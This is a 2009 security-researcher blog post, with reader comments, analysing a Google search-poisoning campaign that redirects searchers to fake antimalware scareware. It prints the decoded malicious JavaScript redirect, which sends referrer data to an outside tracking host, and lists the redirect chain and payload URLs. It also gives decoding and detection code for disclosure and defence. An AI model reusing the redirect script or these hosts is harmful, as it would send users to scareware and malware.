Blog for hpHosts, and whatever else I feel like writing about ....

Sunday, 7 June 2009

Roguerific! aka: Don't worry Google, we can wait ....

Alas it seems that, despite all of the publicity and all of the reports Google have been sent, they still haven't bothered to remove the malicious domains from their index, or the malicious blogs on their Blogspot service (and yes, I'm aware Google aren't the only company with these problems, but they're the most popular, so at present they're seeing the most abuse).

I've been monitoring the Google results since my last report on the Google poisoning issue, and have been saddened to see not a reduction in the number of malicious URLs in the index, but an increase.

Almost every single one of this variation (there are of course other variations) I've seen thus far has had identical properties that, for a search engine with a spider as good as Google's, should be easy enough to identify and eradicate (a rough sketch of what checking for a few of these might look like follows the list):

1. All URLs lead to a page with:

  1. a 2.js file
  2. gibberish in <pre></pre> tags, with further such .htm pages linked to each other underneath (all pages linked to have identical properties)
  3. ALL pages on the domain link to each other with identical tags (and ONLY link to these pages), and link to the 2.js file
  4. ALL pages have title tags containing the name of the .htm file 3 times, for example:

    cadets.htm - cadets (cadets on the waterfront, yesterday tractor cub cadets)
    broderick.htm - broderick (terrace dining room broderick, lillian broderick)
    prototype.htm - prototype (vecto prototype board, what is a prototype lexical relation)
    sli.htm - sli (p5n32 sli installation, bfg 7950 gt sli)
    achat.htm - achat (achat immobilier bons en chablais, centrale achat electrom nager)
    etc etc etc ....

    Full results for two of the domains can be found at:

    http://hosts-file.net/misc/Google_Poisoning.txt

  5. All links are encased in <tt></tt> tags.


2. All pages are in sub-directories whose folder names are gibberish
3. The 2.js file ALWAYS begins with eval(String.fromCharCode(
4. The decoded JS contains:

function f(){
var r=document.referrer,t="",q;
if(r.indexOf("google.")!=-1)t="q";
if(r.indexOf("msn.")!=-1)t="q";
if(r.indexOf("yahoo.")!=-1)t="p";
if(r.indexOf("altavista.")!=-1)t="q";
if(r.indexOf("aol.")!=-1)t="query";
if(r.indexOf("ask.")!=-1)t="q";
if(r.indexOf("comcast.")!=-1)t="q";
if(r.indexOf("bellsouth.")!=-1)t="string";
if(r.indexOf("netscape.")!=-1)t="query";
if(r.indexOf("mywebsearch.")!=-1)t="searchfor";
if(r.indexOf("peoplepc.")!=-1)t="q";
if(r.indexOf("starware.")!=-1)t="qry";
if(r.indexOf("earthlink.")!=-1)t="q";
if(t.length&&((q=r.indexOf("?"+t+"="))!=-1||(q=r.indexOf("&"+t+"="))!=-1))
window.location = ("http://everylog1.com/in.cgi?9&seoref="+encodeURIComponent(document.referrer)+"&parameter=$keyword&se=$se&ur=1&HTTP_REFERER="+encodeURIComponent(document.URL)+"&default_keyword=default");
}
window.onFocus = f()


Obviously, the URL that window.location takes you to differs (it seems to change every few days to a week or so).
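
As an aside, for anyone wanting to see what one of these 2.js files contains without actually running it, the String.fromCharCode() wrapper mentioned in item 3 is trivial to unwrap. A minimal sketch (the payload string below is a made-up stand-in, not one of the real ~3K files):

// made-up stand-in for a real 2.js payload
var payload = 'eval(String.fromCharCode(102,40,41))';
var head = 'eval(String.fromCharCode(';
// pull out just the comma-separated character codes
var inner = payload.slice(head.length, payload.lastIndexOf('))'));
var codes = inner.split(',');
var decoded = '';
for (var i = 0; i < codes.length; i++) {
  decoded += String.fromCharCode(parseInt(codes[i], 10));
}
// decoded now holds the cleartext JS, without it ever having been executed
alert(decoded);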

5. The 2.js files are always the same size (3K), though they have different MD5s
6. The resulting URL that window.location takes you to ALWAYS goes through intermediaries, but invariably leads to a rogue containing the usual scareware content, which, again, should be a piece of cake for Google's spider to identify.

In the case of eddierivera.com, this is:
  1. everylog1.com/in.cgi?9&seoref="+encodeURIComponent(document.referrer)+"&parameter=$keyword&se=$se&ur=1&HTTP_REFERER="+encodeURIComponent(document.URL)+"&default_keyword=default
  2. everylog1.com/redirect2/
  3. homeandofficefun.com/go.php?id=2004&key=ff0057594&p=1 (Intermediary)
  4. antimalwareonlinescannerv3.com/1/?id=2004&smersh=b63db03e5&back=%3DDQ0zjD0NEQNMI%3DO (SCAREWARE PAGE)
  5. antimalwareonlinescannerv3.com/download.php?id=2004
  6. antimalwareonlinescannerv3.com/download/Setup-d2c79_02004.exe (PAYLOAD)

    VirusTotal: http://www.virustotal.com/analisis/6a4547ca8aa3634633a23ec4578ab4aa982f54deea263b672378b7b5896ba5b9-1244420368
    Threat Expert: http://www.threatexpert.com/report.aspx?md5=7d96921eebcc78ba717cfeb4e1dbdf3b

7. The folder containing the files almost always has an open index, presumably to improve SEO
8. The parent folder of the folder containing the files also has an open index, and contains a file called "c", the contents of which are the folder's name (the one in the Google index) and "200":

sierrahomesnw.com/nofqe/c
eddierivera.com/iyild/c

Along with a file called 1t, containing the .htm file names:

sierrahomesnw.com/nofqe/1t
eddierivera.com/iyild/1t

A 1r file, containing the file and folder names in the format "folder/file.htm":

eddierivera.com/iyild/1r.txt
sierrahomesnw.com/nofqe/1r.txt

And finally, a randomly named PHP file (8.7K), whose content has always been <ok>:

sierrahomesnw.com/nofqe/rie.php
eddierivera.com/iyild/pal.php

On a side note, it appears the rogue domain in this case only allows a maximum of 2 connections per IP, as subsequent attempts result in its returning a 404 (checking via a proxy confirmed this). It's also worth noting that attempts to grab the executable directly aren't going to work, as the filename is partially static and partially dynamic (Setup-{random}_02004.exe); I've grabbed 4 separate files thus far.
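
Given how uniform these properties are, it's not hard to imagine a crude automated check; here's the rough sketch promised above. To be clear, this is purely illustrative (the function name and regexes are mine, and it only covers identifiers 1.1, 1.4 and 1.5), not a claim about how Google's spider does or should work:

// Rough sketch: given a page's HTML and its .htm file name, test identifiers 1.1, 1.4 and 1.5
function looksLikePoisonPage(html, htmFileName) {
  // file names seen so far are plain alpha, so no regex escaping is done here
  var name = htmFileName.replace(/\.htm$/, '');
  // 1.1: the page pulls in a 2.js file
  var hasTwoJs = /<script[^>]+src=["'][^"']*2\.js["']/i.test(html);
  // 1.5: links are encased in <tt></tt> tags
  var hasTtLinks = /<tt>\s*<a\s/i.test(html);
  // 1.4: the title contains the file's name 3 times, e.g. cadets (cadets ..., ... cadets)
  var titleMatch = html.match(/<title>([\s\S]*?)<\/title>/i);
  var nameCount = 0;
  if (titleMatch) {
    var hits = titleMatch[1].match(new RegExp(name, 'gi'));
    nameCount = hits ? hits.length : 0;
  }
  // any one of these alone means nothing; it's the combination that matters
  return hasTwoJs && hasTtLinks && nameCount >= 3;
}

Any one identifier alone would trip on plenty of legitimate pages (the title check especially); it's only the combination that's worth flagging. The payload name from the side note could be matched in a similar fashion, e.g. /^Setup-[0-9a-f]+_02004\.exe$/i, going by the samples I've grabbed so far.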

9 comments:

Unknown said...

The tt tag is teletype, isn't it? Why would that be an indication that malware resides on the site?

MysteryFCM said...

It's not an indication of malware, just an identifier that can be used with the rest to identify and flag the sites in question.

Unknown said...

I'm confused. You mean the tt tag is a "pre-qualifier" that would act as a filter for Google to know what sites need more evaluation?

MysteryFCM said...

Only when the other identifiers are present as well. On its own it means nothing.

Unknown said...

So items one through eight have to prevail for the site to be marked for further review?

Would it have to be all eight or a combination of some? If it were a combination, then I assume there would be some kind of priority ranking.

Would that review be done by a Google person or would it be automated?

MysteryFCM said...

In the case of this one, all identifiers would need to be present to prevent F/Ps (false positives).

Ideally, reviews would be done by a human.

MysteryFCM said...

Expanding on this, if they automated it, their spider should, I assume, be capable of the same functionality found in the likes of Wepawet, which would allow a sort of sandbox testing; that would then let them easily identify that a site is trying to push an install via misleading means (combining the Wepawet functionality with AV scanners, for example, would identify the installers themselves, which would in turn indicate a malicious site).
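
To give a (purely illustrative) idea of the sandbox side of it, even something as simple as shadowing document and window before evaluating the decoded script would reveal the redirect without letting it run for real. This harness is mine, not Wepawet's:

// hypothetical harness: shadow document/window, eval the decoded 2.js source,
// and see whether the faked window.location gets set
function probe(decodedSrc, fakeReferrer) {
  var document = { referrer: fakeReferrer, URL: 'http://infected.example/xyz/cadets.htm' };
  var window = { location: '' };
  eval(decodedSrc); // defines f(), and window.onFocus = f() runs it against the fakes
  return window.location; // non-empty means the script tried to redirect the "visitor"
}
// probe(decoded, 'http://www.google.com/search?q=cadets') => the everylog1.com URL
// probe(decoded, 'http://example.com/') => "" (no search engine referrer, no redirect)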

Unknown said...

No insult intended to your technical skills (and the MVP award attests to this... your technical skills are beyond question), but the Google guys are pretty sharp too.

So do you think they've not thought of this, or they have thought of it but the idea was rejected?

Or might it just be that the idea is stalled in the Google bureaucracy?

MysteryFCM said...

I've no doubt they'll have thought of it, or something similar. It's more likely that it's either been rejected due to xyz, or that it's still being kicked around/tested.